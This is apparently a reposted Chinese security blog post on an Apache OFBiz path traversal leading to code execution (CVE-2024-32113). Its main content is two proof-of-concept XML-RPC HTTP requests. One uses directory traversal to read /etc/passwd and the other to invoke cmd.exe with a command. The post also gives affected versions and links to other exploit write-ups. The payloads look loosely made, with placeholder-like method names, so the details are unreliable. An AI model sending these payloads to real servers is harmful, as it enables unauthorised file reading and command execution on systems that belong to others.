Apache OFBiz 目录遍历致代码执行漏洞（CVE-2024-32113）

admin

107412
文章

89
评论

2024年5月26日11:44:07评论61 views字数 667阅读2分13秒阅读模式

01—

CVE-2024-32113

POC：

Poc-1POST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml

<?xml version="1.0"?><methodCall>  <methodName>example.createBlogPost</methodName>  <params>    <param>      <value><string>../../../../../../etc/passwd</string></value>    </param>  </params></methodCall>





Poc-2POST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml

<?xml version="1.0"?><methodCall>  <methodName>performCommand</methodName>  <params>    <param>

<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:</string></value>    </param>  </params></methodCall>

影响版本：Version: below <=18.12.12

原文链接：

原文始发于微信公众号（道玄网安驿站）：Apache OFBiz 目录遍历致代码执行漏洞（CVE-2024-32113）

左青龙
微信扫一扫

右白虎
微信扫一扫

Apache OFBiz 目录遍历致代码执行漏洞（CVE-2024-32113）

万户-ezOFFICE download_ftp.jsp 任意文件下载漏洞

CVE-2024-28995 漏洞复现

某餐饮服务平台-listuser-信息泄露漏洞复现

契约锁add存在远程命令执行漏洞

CVE-2024-3105 (CVSS 9.9) WordPress插件Woody Code Snippets存在RCE

某BI平台未授权信息泄露漏洞复现

悦库企业网盘 /user/login/.html SQL注入漏洞【附poc】

某捷统一上网行为管理与审计系统某接口存在RCE

CVE-2024-26229提权复现测试记录

WVP视频平台未授权漏洞

发表评论

在线咨询

微信